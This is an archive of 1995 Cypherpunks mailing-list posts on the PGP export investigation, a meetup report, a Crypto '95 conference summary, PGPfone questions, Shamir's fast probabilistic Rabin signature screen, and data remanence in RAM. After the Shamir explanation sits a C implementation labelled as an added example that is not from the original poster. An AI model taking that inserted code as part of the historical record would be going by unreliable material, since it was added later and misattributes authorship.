> on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that
> he exported PGP Version 1.0 to the team that developed PGP 2.0
> overseas, any export that Phil performed would have of necessity to
> have taken place before then.

PGP 1.0 was available in at least Finland and Australia by 28 Aug 91, according to an ftp list John Gilmore posted on that date. However, the first available date is presumably not as important as the most recent offense, and I haven't seen which specific allegations the gov't is investigating.

Jim Gillogly
11 Halimath S.R. 1995, 17:35

From tcmay at got.net Sat Sep 2 11:01:19 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 2 Sep 95 11:01:19 PDT
Subject: Cypherpunks Santa Cruz -- Great Party!
Message-ID:

I want to update the general list on how well our "Cypherpunks Santa Cruz" party/meeting went last Saturday. Apologies to those who get this twice, as I just sent it out to the folks on the mailing list of interested folks I keep. (Not all of them are readers of this list, so....)

It was a great success, from all indications, and we'll be doing it on a regular basis. "Meet locally, communicate globally."
--Tim

>Date: Sat, 2 Sep 1995 11:03:33 -0700
>X-Sender: tcmay at mail.got.net
>Mime-Version: 1.0
>To: (Recipient list suppressed)
>From: tcmay at got.net (Timothy C. May)
>Subject: Cypherpunks Santa Cruz -- Great Party!
>
>
>This is a report on the Cypherpunks Santa Cruz party/meeting held last
>Saturday at my house. For those of you on this list (52 at last count,
>obviously not all locals) who missed it, it was considered by many who
>commented to me to be a great success.
>
>Some highlights:
>
>- I counted 23 attendees, from as far away as Oregon (Greg Broiles) and San
>Luis Obispo (Jeff Simmons), and with a bunch of folks from Marin and the
>Greater Bay Area.
>
>- We got rolling around 5, when the first cars started filling up my
>parking area. Things kept going 'til 5 in the morning (!), when the last
>stragglers departed and those staying the night found their futons and
>crashed.
>
>- Not too much was formally done. We had a round of introductions (and I
>provided name tags, which were purely voluntary, in that anyone could
>volunteer not to wear them and hence not be remembered by others...most
>wore them). Later, after the barbecue, Bob Fleming and Cherie Kushner
>described their work on micropower, ultrawideband radio "localizers." While
>not strictly "crypto" related, there are overlapping themes (privacy,
>surveillance, and even some of the math overlaps).
>
>- Mostly it was a chance for our local community of folks interested in
>these issues to mingle and make contact. I expect we may have a larger
>focus than just "crypto" (although Cypherpunks have always had a larger
>focus than just cryptography, of course). Especially as there are folks
>doing some neat stuff on the Web out here in Santa Cruz.
>
>- Two folks from my local ISP attended (Jay and Marc), and they have some
>thoughts on possibly hosting the Cypherpunks archive site on their system,
>and other ideas. They stayed until nearly 5 a.m., talking with us about
>networking, Web pages, etc.
>
>(Santa Cruz has long been a hotbed of computer activity, especially of the
>more independent sort. So the good turnout from local folks could be very
>promising for Cypherpunks themes. Interestingly, Linus Torvaldis (sp?), of
>Linux fame, had just been in town a couple of days before.)
>
>I want to avoid opening the meeting up too broadly, to, for example "anyone
>interested in computers," as this would produce unpredictable turnouts and
>lots of folks who want to learn to use Windows, or need help in dBase, etc.
>Better to keep an ostensible focus on "Cypherpunks" themes, with forays
>into related areas.
>
>Some people commented to me that they hope the meetings/parties are
>monthly, but I suspect every other month may be more reasonable...after
>all, a monthly meeting would mean another one only 3 weeks from today, and
>I can't see this happening.
>
>Anyway, I expect to announce another one for sometime in October. I also
>may be having a "PenSFA" party at my place in early November (11/11 is
>being considered), and may merge the two. It's a good opportunity for
>mingling.
>
>Another attendee offered the possibility of having a Cypherpunks Santa Cruz
>meeting/party at her house, so some rotation to other venues may start to
>happen. I think the notion of having these things at private houses is
>better than trying to get space at a local company, for example. Parties in
>houses are more intimate, less formal, and don't require the "corporate
>approvals" that are sometimes needed. Besides, I'm offering my house and
>have no contacts at local companies.
>
>I expect to be able to host a lot of these things, and if some others
>volunteer as well, we'll be set. (I expect attendance will not equal the 23
>at this "first" meeting, for obvious reasons. This means meetings/parties
>could even be held in apartments or condos. But I'm not suggesting this,
>only noting it.)
>
>So, thanks for coming!
>
>--Tim May
>

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From adwestro at ouray.cudenver.edu Sat Sep 2 11:18:31 1995
From: adwestro at ouray.cudenver.edu (Alan Westrope)
Date: Sat, 2 Sep 95 11:18:31 PDT
Subject: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 02 Sep 1995, "Perry E. Metzger" wrote:
> Alan Westrope writes:
> > Michael Froomkin wrote:
> > > PS when does the statute of limitations run out?
> > June '96. Zimmermann and Dubois appeared on a local talk radio show
> > recently; a friend happened to catch the program, taped it, and played
> > excerpts at a Cypherpunks meeting. This date was mentioned by Phil Dubois.
> That's not possible. The offense in question took place on or before
> September 8, 1992, and the statute of limitations is, to my knowledge,
> three years. Even if it were four years, it would have to be September
> 8th of that year. Branko Lankester announced availability of PGP 2.0
> on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that
> he exported PGP Version 1.0 to the team that developed PGP 2.0
> overseas, any export that Phil performed would have of necessity to
> have taken place before then.

Point taken. Dubois was referring specifically to the current California grand jury investigation in association with U.S. Customs. He said that this grand jury has until June '96 to issue an indictment or...uhhh...get off the pot.
I suppose Phil could be charged by some other entity with ITAR/DTR violations relating to the "export" of PGP, and I'm not sure what would be the date of this putative violation: the date Phil gave the program to others, allegedly "knowing" that doing so would result in its export; or the date PGP actually appeared at overseas sites. I suspect I'm not the only one confused by this, considering the convoluted, baroque and outdated laws involved.

Mebbe somebody oughta ask Sternlight...:-)

Alan Westrope          __________/|-,
                      (_)        \|-'
2.6.2 public key: finger / servers
PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEieZVRRFMq4NZY5AQF8aAP+MoWcVxn5tVTJ2+SM5HTGFEQqwVnOae2L
cNUaiq2gnogX3lNBV4Deou9WOauzde13FO9SRlHsqHw8D9YnQI14JburLwn4HCnf
GdKs48DWzrG7HR4n1u2cmhqdm3TI7/ylyBbK2DhlUS98JOO0Q0m9+E6uSUcy+NNM
Mq8y7jSD8f8=
=K8td
-----END PGP SIGNATURE-----

From dsc at swcp.com Sat Sep 2 11:44:16 1995
From: dsc at swcp.com (Dar Scott)
Date: Sat, 2 Sep 95 11:44:16 PDT
Subject: No Subject
Message-ID:

Timothy May wrote concerning Cyphernomicon,
>You list a Web site in your sig, so presumably you have the right tools to
>browse the Web. And I listed two Web sites that have the Cyphernomicon.
>
>What am I missing?

Thanks for the advice. Here are the two missing pieces.

The first is financial, but might be really psychological. I buy PPP service locally and it is hard for me to casually browse with the meter running in the corner of the screen even at less than a penny a minute. (And any document that mentions David Friedman probably needs study and that takes more time.)

The second is that even at the wee hours of the morning I kept getting refusals from www.oberlin.edu and I couldn't get past the table of contents. I had hoped to collect these as I browse 'em to avoid delays (14.4), hiccups and online time in later reading. (I didn't even try the large html--I suspect my browsers will gag on it.)

The third of the two reasons is some vague notion of taking it to lunch or of annotating the file or the hard copy.

In case it wasn't clear--I couldn't get a peep out of netcom.

My plan is to try oberlin again and if that bogs down, try getting the copy at the location mentioned by Lou Poppler--or any other location mentioned this weekend. Or respond to advice on the best times to try netcom.

I apologize for the implicit assumption in my question about alternate sites that people had your permission to copy the file to their ftp sites and am pleased that you explicitly gave that blessing in your recent mail.

Thanks,
Dar
(list newbie)

===========================================================
Dar Scott                  Home phone: +1 505 299 9497
Dar Scott Consulting       Voice: +1 505 299 5790 <---
8637 Horacio Place NE      Email: darscott at aol.com
Albuquerque, NM 87111      dsc at swcp.com
                           Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
My preference for attached files is in this order: AOL, Mime, Binhex4, PGP, UUencode
===========================================================

From jsimmons at goblin.punk.net Sat Sep 2 12:13:39 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Sat, 2 Sep 95 12:13:39 PDT
Subject: Cyphernomicon for ftp
Message-ID: <199509021911.MAA15754@goblin.punk.net>

I remember the trouble I had finding a text copy of the Cyphernomicon ... So until someone posts it on a site with higher bandwidth, it's available at:

ftp.goblin.punk.net/pub/docs/cypherpunk.faq.gz or cypherfq.zip

We're talking 400K+ over a 28.8 modem, so don't expect much in the way of speed ...

--
Jeff Simmons
jsimmons at goblin.punk.net

From hfinney at shell.portal.com Sat Sep 2 13:20:42 1995
From: hfinney at shell.portal.com (Hal)
Date: Sat, 2 Sep 95 13:20:42 PDT
Subject: Crypto '95 report
Message-ID: <199509022019.NAA21443@jobe.shell.portal.com>

This was the first year I attended a Crypto conference (although for the last two years I have "crashed" the evening rump session, where less formal 5-10 minute presentations are given). A number of list members were present and it was good to meet a lot of new people.

I was a bit disappointed that few of the technical sessions were in areas that I am interested in or that seem to have bearing on CP issues. I have read many of the Crypto proceedings and this year the pickings seemed to be unusually slim.

Richard Schroeppel gave a very clear presentation on an implementation of elliptic curve cryptography for a Diffie-Hellman-like key exchange. This is a two-dimensional variation from the regular integers that are used in most of the number theory based crypto, and has some advantages. This new implementation is actually faster than regular DH for apparently the same security level. It looks like elliptic curve crypto is on the threshold of coming into widespread use. I believe the patent situation is one of the main reasons.

There were several papers on secret sharing, something we have discussed here as an alternative to escrow for handling lost keys. Amir Herzberg et al had a method for "resharing" a shared secret periodically and securely, so that if an adversary was stealthily sneaking in and learning shares occasionally, he would be put back to square one when the secret resharing phase occurred. Only the trustees are involved, not the original secret holder, and the secret does not have to be reconstructed during the resharing.

Bruce Dodson presented some results on using the Number Field Sieve factoring algorithm.
Their implementation looks to be the fastest available now, considerably better than the Quadratic Sieve that was used for RSA-129. I believe they estimated 1000 MIPS years would have been enough for NFS to do RSA-129 compared to the 6000 MIPS years for QS. They are now going to try another challenge number, RSA-130. (RSA has challenge numbers every 10 digits in size (or maybe it was 5): RSA-140, RSA-150, etc.)

There was one paper on electronic cash, by Okamoto. His technology is distinguished by allowing divisibility - you can take a $10 and divide it into 2 $5's without going back to the bank. However he has always had a problem that your various pieces of cash are linkable, although not traceable to the user who withdrew them. His new method uses smaller amounts of data. I was encouraged to see some progress on the linkability issue: for the first time (that I have seen) he admits it as a problem; he now has it so that theoretically the linkability is only within a single divided piece of cash (so that if you didn't divide you wouldn't have linkability). Actually the overheads are too large for this to be quite true, but it is a step in the right direction. He also included elimination of linkability as a future goal. Unfortunately his oral presentation was extremely shallow, mostly describing what electronic cash was.

There was also a paper on "fingerprinting", the encoding of hidden information into a document so that if the doc is leaked it can be traced to the leaker. The talk wasn't very clear but I was able to glean enough that I now believe that this is possible whereas I didn't before.

I was discouraged to see a whole session on key escrow. One presenter described key escrow as a whole new area of cryptography, analogous to the discovery of public key crypto when all that was known previously was conventional key. Now there are three areas. The academic crypto community seems to be greeting key escrow enthusiastically as a new technical challenge.

The rump session had some good stuff, I thought. Matt Blaze et al had a paper on "Master Key" cryptosystems, a variation on escrow where the government can read all the messages using a certain cryptosystem. They pointed out the similarity to the trap door concept used in public key cryptography and concluded that an efficient master key system would be an efficient public key system. If you believe that the latter can't exist then it follows that the master key versions can't exist either.

Bruce Schneier gave a talk summarizing the sketchy information known about Skipjack (the cipher in Clipper), including some FOIA'd docs. These included some comments from design reviews by Mykotronx on earlier versions, which included references to F and G boxes or tables. This is the first I had heard of this and helps explain why people thought S-1 was Skipjack or a hoax, since it had F and G tables. (I hadn't felt that the number of rounds and key/block sizes were sufficient coincidence to preclude independent invention.)

A new crypto library was announced from AT&T. It is written in C and has a bignum lib (arbitrary size) and the usual crypto suspects, although I think not RSA presumably due to patent issues. On a reasonably modern PC it could do an RSA 1024 bit signature in 900 milliseconds. Email to lacy at research.att.com with subject CRYPTOLIB to be informed on when it will be released and how to get it.

Dhem and Quisquater described CASCADE, a smart card system with voice recognition for ID rather than the PIN usually used. http://www.dice.ucl.ac.be/~dhem/cascade/. This talk was hard to understand due to the language differences.

Eric Hughes, co-founder of the cypherpunks, announced the formation of Cypherpunk Laboratories, a California non-profit corporation. It is intended to be a common resource for people motivated by freely available strong cryptography tools. Among other things it will offer scholarships and prizes to students who create relevant work and papers, consider establishing an online journal focusing on implementations of crypto, and work on software development. One project Eric mentioned was to create a replacement for PGP.

Ron Rivest proposed probabilistic key escrow, which he described as "translucent" crypto. The idea is that with every message you send there is a Law Enforcement Access Field, but there is only some probability p that it is readable, and you can't tell if it will be readable or not. This way you don't lose as much privacy but criminals can't take the risk that maybe they'll be unlucky and this particular message will be readable.

Shamir had an interesting paper on preventing "flooding" attacks. A server may check for signatures on incoming messages to reject bogus ones (only certain sigs are valid) but just doing a signature check may take too long if it is really being flooded. Shamir came up with a kind of signature which can be quickly probabilistically checked, based on a variation on the Rabin cryptosystem. You can do almost all the work using single precision and it should be very fast. I will write this up if anyone is interested.

Our own Wei Dai, at 19 the youngest author, has spent his summer vacation developing with Josh Benaloh at Microsoft an improved modular reduction algorithm, which unfortunately will be patented (or at least they will try). BTW a number of people from Microsoft were in attendance at Crypto, including other list members. Obviously this crypto stuff is considered very important at MS.

One of the more interesting talks I thought was from cypherpunk Doug Barnes, on "identity agnostic" electronic cash. This is basically an idea for creating a Magic-Money-type electronic cash server without violating Chaum's cash patent. What you do is to run the server and publish a spec it will follow. All the server does is do an RSA signature on the raw data it receives and decrement the user's account accordingly. The user has a choice of doing blinding or not on the signature. Chaum's patent covers the blinding, so if the user wants to do that he should be sure to license the patent or live somewhere it doesn't apply (or ignore it if he figures he's too small potatoes for them to care about). But the server isn't responsible for checking all this. It just does RSA sigs, which is prior art as far as Chaum's patent goes. Users can blind or not, it doesn't care. It is "identity agnostic" as Doug says. The implication is that with an RSA license you could run this kind of bank (online cash) and ignore Chaum's patents, while a horde of end users violate the patents but take safety in numbers and get anonymity. Lawyers like to go after big targets but the servers aren't violating anything.

The other things I enjoyed in the conference were the non technical talks by Bob Morris (senior), retired NSA, and later Adi Shamir. Morris said, with what I thought was peculiar emphasis, "never underestimate the amount of time, money, and effort your opponent will put into breaking your encryption." He was supposedly speaking in the context of the German (and Allied) mistakes during WWII, but I got the impression he was talking about today, and in fact warning of NSA efforts to spy on people. He went on to describe the many ways mikes and antennas can be planted or used - he looks at a telephone and sees a microphone, and the hand cord is an antenna. All in all a rather chilling talk from someone who obviously can't say as much as he would like to.

Shamir had some interesting anecdotes about the invention of RSA. He emphasized what amateurs the three of them were, claiming this was probably an advantage.

Some of the other talks I enjoyed without following all the details were the cryptanalysis ones. A lot of systems were broken or weaknesses found.
Most were not ones I was familiar with but it just emphasizes how hard it is to really come up with something strong. All those bozos on sci.crypt with their "break this" challenges would benefit from seeing some of these results. All in all there were several interesting results even if the percentage seemed smaller than usual. Hal Finney From mfroomki at umiami.ir.miami.edu Sat Sep 2 14:07:04 1995 From: mfroomki at umiami.ir.miami.edu (Michael Froomkin) Date: Sat, 2 Sep 95 14:07:04 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com> Message-ID: On Sat, 2 Sep 1995, Perry E. Metzger cleverly sought to get legal advice from me by writing:: > > Michael, you are one of our local lawyers. Could you please confirm > the length of the statute of limitations? > harumphf. (1) I'm not "local" -- as I plan to argue in my cameo at the next Sun User's Group confernece "cyberspace is not a jurisdiction" [apologies if you meant local == USA]; (2) as it happens, I'm nowhere near my law books at the moment, being telnetted from abut 1800 miles (I'd guess) away....so I'm unable to oblige right now. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki From mixmaster at obscura.com Sat Sep 2 14:38:32 1995 From: mixmaster at obscura.com (Mixmaster) Date: Sat, 2 Sep 95 14:38:32 PDT Subject: Nautilus 1.0 under OS/2 Warp? Message-ID: <199509022131.OAA04066@obscura.com> Has anyone run the Nautilus 1.0 secure telecom software in a DOS box under OS/2? When I've tried it, it starts up, audio saying "welcome to Nautilus" comes out of my speakers, and I'm prompted for a passphrase. The problem comes when it tries to connect to the modem. 
It comes back and says "Remote failed to connect" followed by "Resetting modem...". Then the software exits. It never even takes the phone line off the hook. Other DOS comm software works just fine in a DOS box, so why not Nautilus?

From anon-remailer at utopia.hacktic.nl Sat Sep 2 14:45:23 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Sat, 2 Sep 95 14:45:23 PDT Subject: Re: anyone know what this "top secret" code does? In-Reply-To: <40odtn$1md@teal.csn.net> Message-ID: <199509022145.XAA02299@utopia.hacktic.nl>

hallam at zorch.w3.org (Phillip M. Hallam-Baker) wrote:
> The code looks more than a casual hoax. It's not Skipjack, but that
> does not mean it's not NSA originated. It's probable that many of the
> people who designed skipjack don't know it's skipjack. If you read
> the code carefully it is obvious why it's not skipjack, an S2
> algorithm is referenced explicitly.
[...]
> Regardless about whether or not it is skipjack it challenges one of
> the basic assumptions of many cipher designers, namely that the
> amount of diffusion should be maximized at each round. I am now
> very much less than convinced that this is in fact an issue. The S1
> design with its narrow diffusion provides very strong guarantees
> that one round cannot undo the work of the previous one.
> S1 must therefore be considered to be a significant contribution to
> the cryptographic community. It has challenged a fundamental tenet of
> faith which has so far been accepted without argument. It is thus
> paradigmatic in that it may lead to a new method of cipher design.
Does anyone remember the scenario someone suggested a while back that hypothesized a scheme by the NSA or other TLAs to encourage the use of WEAK crypto? It involved spreading a lot of F.U.D. about PGP and other strong crypto methods, followed by the discovery/leak of a supposedly "strong" crypto algorithm to replace it. This may not be it.
It may just be a trial balloon to gauge the reaction of the crypto community to an anonymous, "gift from heaven" crypto algorithm. But at least be aware of what COULD happen. One tactic that might be tried is an intentional "leak", followed by a flurry of legal actions designed to make it look like the "leak" was going to cause some real damage to their cryptanalysis efforts, due to it being "unbreakable", or whatever. Of course, anything "leaked" would be crippled in some undetectable manner so as to provide a back door...

From rrothenb at ic.sunysb.edu Sat Sep 2 15:45:05 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Sat, 2 Sep 95 15:45:05 PDT Subject: VoicePGP Query Message-ID: <199509022244.SAA24545@csws5.ic.sunysb.edu>

Due to some acct. problems I lost most of the mail sent to me betw. May and September. I saw a post in a newsgroup about VoicePGP betas being available, though only for Mac and Win'95... is this true? And if so, will there be a Win 3.11 or OS/2 or DOS version out eventually? I don't intend to get Win '95 for as long as I can avoid it (and this is NOT the start of an OS flame war...) Also, what's the status of PGP 3.0? Thanks, Rob

From terrell at sam.neosoft.com Sat Sep 2 15:51:31 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Sat, 2 Sep 95 15:51:31 PDT Subject: MIT distributing PGPfone -Reply Message-ID: <199509022301.SAA00324@sam.neosoft.com>

>PGPfone was out of the U.S. less than 3 hours after first appearing
>publicly at the MIT site.
>
>As I noted in a previous message, MIT takes various steps to ostensibly
>protect against export, but there is clearly no practical means of stopping
>export once the software has been received by someone.
>
>I got my copy of PGPfone 16 hours after its public release, via an
>anonymous person who posted it on the Cypherpunks list through an anonymous
>remailer.
>Of course that list is distributed to more than 20 foreign
>countries, so "export" happened that way, as well as by other means.
>
>--Tim May
>
As Tim May's .sig should say: "National borders are not even speed bumps on the information highway." Buford C. Terrell 1303 San Jacinto Street Professor of Law Houston, TX 77002 South Texas College of Law voice (713)646-1857 terrell at sam.neosoft.com fax (713)646-1766

From hfinney at shell.portal.com Sat Sep 2 17:17:59 1995 From: hfinney at shell.portal.com (Hal) Date: Sat, 2 Sep 95 17:17:59 PDT Subject: PGPfone over Appletalk Message-ID: <199509030016.RAA03752@jobe.shell.portal.com>

From: "Rev. Mark Grant"
> Can someone tell me how to run PGPfone over Appletalk ? The
> documentation says that support has been added for this release, and
> there's a preferences box to check to use it, but there's no information
> I can find in the documentation on how to initiate a call over
> Appletalk.. it just says to enter a telephone number to dial. If I
> press 'Connect' without entering anything it hangs up the Mac.
>
> How do I tell it which machine I want to connect to ?
I changed the preferences box setting, but then I exited and restarted the program so that it came up in "appletalk" mode. This is probably the step you are missing. I did this on two different machines, and then when I clicked connect it no longer tried to open the modem, instead it put up a dialog box allowing me to click on the machine running the other PGPfone. I did that and it connected OK. There is a nice audio simulation of an old-fashioned telephone bell ringing. Unfortunately my appletalk "network" consists solely of my power mac and an old 68030 mac laptop, the latter apparently being underpowered for PGPfone. The voice quality changed occasionally as the software adaptively tried different coders, and the powermac instance of the program finally printed a message saying that the list of coders had been exhausted.
Hal

From hfinney at shell.portal.com Sat Sep 2 18:14:53 1995 From: hfinney at shell.portal.com (Hal) Date: Sat, 2 Sep 95 18:14:53 PDT Subject: Quickly checking signatures Message-ID: <199509030113.SAA19877@jobe.shell.portal.com>

Let me describe Shamir's method for quickly doing a probabilistic signature check. Since this was a rump session paper he didn't have it written up.

Shamir uses a variation of the Rabin system. The Rabin encryption system is similar to RSA, but instead of exponents which are relatively prime to the predecessors of the factors of the modulus, the exponent used is 2. This requires somewhat different techniques. A message M is encrypted by doing M^2 mod n. The decryption is then done by taking the modular square root. There are a few technical hitches that occur here but nothing major.

Similarly a message M is signed by calculating its modular square root S such that S^2 = M mod n. Note that with Rabin you can't just sign any arbitrary number as that may allow the factors to be revealed. However this is not a major problem because practical systems in use today sign specially padded hashes, not arbitrary numbers.

Now Shamir uses a slight modification to this. Normally we have:

S^2 = M mod n

This can be written as:

S^2 = M + C*n

for some C, which is simply the definition of modular equality. Now, what he suggests is that instead of sending S as the signature of M, you send C. This is justified on 3 grounds:

- C is the same size as S
- C has the same security as S (knowing M and n you can derive C from S and vice versa)
- C and S are equally easy to generate

However, by sending C as the signature of a message M it allows a fast screening to be done. The idea is that the message should be accepted if M+C*n is a perfect square (because then S can be derived as the normal square root - that is how you get S from C as mentioned above). And this is something that can be checked quickly.
In number theory there is a notion of a "quadratic residue" modulo some number. If a number is a quadratic residue that simply means that it has a square root, that it is the square of some other number using the modulus. With a prime modulus half of the numbers are quadratic residues and half are not. For example, with modulus 7 the q.r.'s are 1, 2 and 4 and the non q.r.'s are 3, 5, and 6. It turns out that testing whether a number x is a quadratic residue modulo a prime p can be done by calculating x^((p-1)/2) mod p. This will be 1 if and only if x is a q.r.

Now, the key idea is this: if a number is a perfect square then the result of taking that number modulo a prime must be a quadratic residue. This means that we can quickly determine that C is a perfect square by checking whether C mod p for various random small primes p is a quadratic residue. By picking p to be a single precision prime of say 16 bits, the q.r. calculation can all be done without using multiple precision arithmetic and so it will be very fast compared to actually checking a signature.

So, the procedure for the check is as follows: given n, M and C, choose a small prime p and calculate M+C*n mod p. Then raise this to the (p-1)/2 power mod p and see if the answer is 1. If it is, we give a "provisional" acceptance to the signature. If it is not, we reject the signature; it cannot be valid. This test may be repeated a few times with different values of p to improve the rejection of bad signatures. Once we have taken the input numbers mod p the rest of the arithmetic can be done with ordinary single precision integer variables.

(One thing I overlooked is the possibility that M+C*n will be a multiple of p. In that case M+C*n mod p will be 0 and this is a provisional pass.)

Of course checking the signature the old-fashioned way just takes a single multi precision multiplication, which won't be all that slow.
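The screening procedure just described, as an added example that is not part of Hal's message: a toy Rabin signer that publishes C rather than S, the exact perfect-square check, and Shamir's screen that reduces n, M and C modulo random 16-bit primes and applies Euler's criterion. The modulus is a constructed toy built from two primes near 2^16 so that every value fits in uint64_t; rabin_key, rabin_sign, rabin_screen and the other names are hypothetical.

```c
#include <stdint.h>
#include <stdbool.h>

/* Added example, not from Hal's message: Shamir's probabilistic screen for
 * Rabin signatures published as C = (S^2 - M) / n instead of S.  The modulus
 * is a constructed toy (two primes near 2^16) so that S^2 < 2^64 and every
 * value fits in uint64_t; a real system keeps n, M and C in multiprecision
 * and only the screen itself in single precision.  All names are hypothetical. */

typedef struct { uint64_t p, q, n; } rabin_key;

static uint64_t mulmod(uint64_t a, uint64_t b, uint64_t m) {
    return (a % m) * (b % m) % m;              /* m < 2^32: cannot overflow */
}

static uint64_t powmod(uint64_t b, uint64_t e, uint64_t m) {
    uint64_t r = 1;
    for (b %= m; e; e >>= 1) {
        if (e & 1) r = mulmod(r, b, m);
        b = mulmod(b, b, m);
    }
    return r;
}

static bool is_prime(uint64_t x) {             /* trial division is fine at 16 bits */
    if (x < 2) return false;
    for (uint64_t d = 2; d * d <= x; d++)
        if (x % d == 0) return false;
    return true;
}

/* Euler's criterion: 1 = quadratic residue, p-1 = non-residue, 0 = p divides x. */
static uint64_t euler(uint64_t x, uint64_t p) { return powmod(x, (p - 1) / 2, p); }

/* Smallest prime >= start with p = 3 (mod 4): then sqrt(x) mod p = x^((p+1)/4). */
static uint64_t next_blum_prime(uint64_t start) {
    while (!(is_prime(start) && start % 4 == 3)) start++;
    return start;
}

rabin_key rabin_keygen(void) {
    rabin_key k;
    k.p = next_blum_prime(60000);              /* constructed toy sizes */
    k.q = next_blum_prime(62000);
    k.n = k.p * k.q;                           /* below 2^32 */
    return k;
}

/* Signer: pad the payload until it is a square mod p and mod q (standing in
 * for the specially padded hash Hal mentions), take the roots mod p and q
 * and combine them with the CRT.  Then S^2 = M + C*n exactly, with C < n. */
bool rabin_sign(const rabin_key *k, uint64_t payload,
                uint64_t *M, uint64_t *S, uint64_t *C) {
    uint64_t qinv = powmod(k->q, k->p - 2, k->p);   /* q^-1 mod p, by Fermat */
    uint64_t pinv = powmod(k->p, k->q - 2, k->q);   /* p^-1 mod q */
    for (uint64_t pad = 0; pad < 256; pad++) {
        uint64_t m = (payload * 256 + pad) % k->n;
        if (euler(m, k->p) != 1 || euler(m, k->q) != 1) continue;
        uint64_t sp = powmod(m, (k->p + 1) / 4, k->p);
        uint64_t sq = powmod(m, (k->q + 1) / 4, k->q);
        uint64_t s = (mulmod(mulmod(sp, k->q, k->n), qinv, k->n)
                    + mulmod(mulmod(sq, k->p, k->n), pinv, k->n)) % k->n;
        *M = m; *S = s; *C = (s * s - m) / k->n;
        return true;
    }
    return false;                              /* no pad byte worked (negligible) */
}

/* The old-fashioned check: M + C*n must be a perfect square.  A valid C is
 * below n, and rejecting C >= n also keeps M + C*n below 2^64. */
bool rabin_verify_exact(const rabin_key *k, uint64_t M, uint64_t C) {
    if (M >= k->n || C >= k->n) return false;
    uint64_t t = M + C * k->n, r = 0;
    for (int b = 31; b >= 0; b--) {            /* bitwise integer square root */
        uint64_t c = r | (1ULL << b);
        if (c * c <= t) r = c;
    }
    return r * r == t;
}

/* Shamir's screen: for `rounds` random 16-bit primes p, reduce M, C and n
 * mod p first (single precision from here on), form M + C*n mod p and apply
 * Euler's criterion.  A non-residue proves M + C*n is not a square, so the
 * signature is rejected for certain; 1 (residue) and 0 (p divides M + C*n)
 * are only provisional passes.  The primes must be unpredictable to whoever
 * produced C; the seeded LCG here stands in for a real CSPRNG. */
bool rabin_screen(const rabin_key *k, uint64_t M, uint64_t C,
                  int rounds, uint32_t seed) {
    uint32_t state = seed;
    for (int i = 0; i < rounds; i++) {
        uint64_t p;
        do {
            state = state * 1664525u + 1013904223u;
            p = 0x8000u | (state >> 17);       /* candidate in [2^15, 2^16) */
        } while (!is_prime(p));
        uint64_t t = (M % p + mulmod(C, k->n, p)) % p;
        if (euler(t, p) == p - 1) return false;
    }
    return true;
}
```

With this toy modulus the exact check is cheap too; the cost difference Hal describes only appears once n, M and C are multiprecision and the screen is the only single-precision part.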
So this puts a limit on the number of p's you can check this fast way before it becomes slower. Also, you'd have to choose the primes at random as otherwise an attacker who knew your p's could conjure up a C which would produce a quadratic residue for some small number of known p's.

Hal

From pgut01 at cs.auckland.ac.nz Sat Sep 2 11:26:03 1995 From: pgut01 at cs.auckland.ac.nz (Peter Gutmann) Date: 2 Sep 1995 18:26:03 GMT Subject: SUMMARY: Not-so-volatile volatile memory Message-ID: <42a7jr$1me@net.auckland.ac.nz>

About a month ago, I asked for comments about recovering data from semiconductor memory after power had been removed. After much procrastinating, I've finally finished the summary of what people sent me. Many thanks to everyone who responded, in particular to Bob Hale for answering many questions about the possibility of recovering data from DRAM's. If anyone has any further comments to add to this (I'm particularly interested in actual figures for data retention in DRAM cells, although I've been told this is burn-before-reading proprietary information), you can send it to me at the above address.

Peter.

-- Summary: Data retention in semiconductor memory --

Contrary to conventional wisdom, "volatile" semiconductor memory does not entirely lose its contents when power is removed. Both static (SRAM) and dynamic (DRAM) memory retain some information on the data stored in it while power was still applied. SRAM is particularly susceptible to this problem, as storing the same data in it over a long period of time has the effect of altering the preferred power-up state to the state which was stored when power was removed. Older SRAM chips could often "remember" the previously held state for several days. In fact, it is possible to manufacture SRAM's which always have a certain state on power-up, but which can be overwritten later on - a kind of "writeable ROM".

DRAM can also "remember" the last stored state, but in a slightly different way.
It isn't so much that the charge (in the sense of a voltage appearing across a capacitance) is retained by the RAM cells, but that the thin oxide which forms the storage capacitor dielectric is highly stressed by the applied field, or is not stressed by the field, so that the properties of the oxide change slightly depending on the state of the data.

One thing that can cause a threshold shift in the RAM cells is ionic contamination of the cell(s) of interest, although such contamination is rarer now than it used to be, because robotic handling of the materials and the purity of chemicals is greatly improved. However, even a perfect oxide is subject to having its properties changed by an applied field.

When it comes to contaminants, sodium is the most common offender - it is found virtually everywhere, and is a fairly small (and therefore mobile) atom with a positive charge. In the presence of an electric field, it migrates towards the negative pole with a velocity which depends on temperature, concentration of the sodium, the oxide quality, and the other impurities in the oxide such as dopants from the processing. If the electric field is zero then, given enough time, the sodium contamination tends to spread itself around evenly.

